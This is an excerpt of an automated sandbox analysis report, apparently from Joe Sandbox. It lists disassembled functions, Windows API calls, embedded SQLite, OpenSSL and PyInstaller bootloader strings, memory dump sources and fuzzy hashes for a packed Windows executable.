                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction ID: ecca1fa4048c1f0645fd4cf9537cc6e17f9bc88fb270afc802bfe2f958577f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A215022E4D66281F9656B2E5A5113952A35F44BB2F064734DB7EC7EF6DD2CA8408340
                                                                                                                                                                                                                                              Function 00007FF6B7527D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: 7bb057d4a1b864632c54c1fa524d2138cc32d689d2c8113b2b7deee4b25e3809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94119322B1CB4586E7608B1AE85432962A4FB88BE4F040238EB5EC77B4DF3CD8548740
                                                                                                                                                                                                                                              Function 00007FFE00762310 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                              • API String ID: 3568877910-1635961163
                                                                                                                                                                                                                                              • Opcode ID: b87feab1bb37d1f7e894d0b6f0c64973d7e3dc1ff34bf6278c2bc73ec1ca2133
                                                                                                                                                                                                                                              • Instruction ID: 8bc84e7e448ad9061fb9ed37595aea3efc8435766db97857e59cd6deae27dd6c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b87feab1bb37d1f7e894d0b6f0c64973d7e3dc1ff34bf6278c2bc73ec1ca2133
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8502C632A0AB8281E7A4AF15E4407BD77A1FB84B84F48813ADB8D477A9DF3CE545C701
                                                                                                                                                                                                                                              Function 00007FF6B7508ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B750906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction ID: 9fe932e7894e609dc6cbd0b8133375de173c3dd386a6ad6ff7ae69a523ee9496
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26419E63B1D68281EA309B1AA5106BA73A5FB85BC8F444135DF8D97BE9DF3CE501CB00
                                                                                                                                                                                                                                              Function 00007FFE01366680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00007FFE01366A2E
                                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFE0136672E
                                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00007FFE01366705
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                              • API String ID: 4225454184-272990098
                                                                                                                                                                                                                                              • Opcode ID: e106108478e0651f8ddcd15e3868f0302f0a4d72454fda0a44bbba454c54d922
                                                                                                                                                                                                                                              • Instruction ID: df3edeea58f236480df521415e573ea3b17efda43eff893cb034913c96ae2533
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e106108478e0651f8ddcd15e3868f0302f0a4d72454fda0a44bbba454c54d922
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD1F1E2A09B8282EB25CB16D4556BD7BA1FB85BC4F468135DE5E0B7A5DF3CE441C300
                                                                                                                                                                                                                                              Function 00007FF6B75090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetCurrentProcess.KERNEL32 ref: 00007FF6B7508590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: OpenProcessToken.ADVAPI32 ref: 00007FF6B75085A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.ADVAPI32 ref: 00007FF6B75085C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetLastError.KERNEL32 ref: 00007FF6B75085D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.ADVAPI32 ref: 00007FF6B7508612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B750862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: CloseHandle.KERNEL32 ref: 00007FF6B7508646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B750916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B7509175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction ID: b448f9862ad4b2578966b4992cc4363d812fab8a517ea80ecd4279cba33f4c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE212D72A0CB8295F650AB14E5156EA6361FF88784F444036EB4DD37E6DF3CE9458780
                                                                                                                                                                                                                                              Function 00007FFE013255D0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                              • Instruction ID: 60b03a799f6db5aed12a9fdf19419178b4bea0e7d4f402f1cd5e2f1220cbba0d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AED1CD72B0878586EB60DF29E0447A9B7A1FB94B94F564032DE8D4B7A4EF3CD940CB41
                                                                                                                                                                                                                                              Function 00007FF6B751B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                              • Instruction ID: 8f0d45b7c7eba19b6f41621ab2dad24c1d84020922bbc82c8f4d57c986d1eaa5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA119322F0D66682FA556B3D5A4113D62929F44BB2F044734DB6FC7EF6DE2CA8518300
                                                                                                                                                                                                                                              Function 00007FFE01321040 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                              • Instruction ID: 6c0ccbc803075c2c03fcf5ec8b9e73aa304961c05cb9ce2ec6932a6695fb6f6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83A13673A0C2D186D7249B19D5806BE7FA2FB91781F164236DB8E8B7A1DE3CE045CB11
                                                                                                                                                                                                                                              Function 00007FFE01328690 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                              • Opcode ID: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                              • Instruction ID: 575dd05fe6571a49196f422d47881cce37dec073e25f4e831228c926f50ad2d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D91D272B082C18AD724DB2AD1806BD7BE0FB54B84F068176DB8D8B6A5DF3CE465C741
                                                                                                                                                                                                                                              Function 00007FFE0132B070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                              • Instruction ID: dee71f65eb457348a94a9745fed1b78a1afe84f3965f3cd9ff4b19bfe8ba4291
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9281DD32A0878287E760AF25D4447AEB7A1FB55B84F068036EB8D4B7A5DF3CE445C701
                                                                                                                                                                                                                                              Function 00007FF6B7502910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: 1b6fb42ce5781a95a3f00f5674bc150965e2f73fdbac7012c130e31c6e47e7c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F731D623B1C68552E7209B69A8506EA6394BF887D8F400136FF8DC3769EF3CD546C600
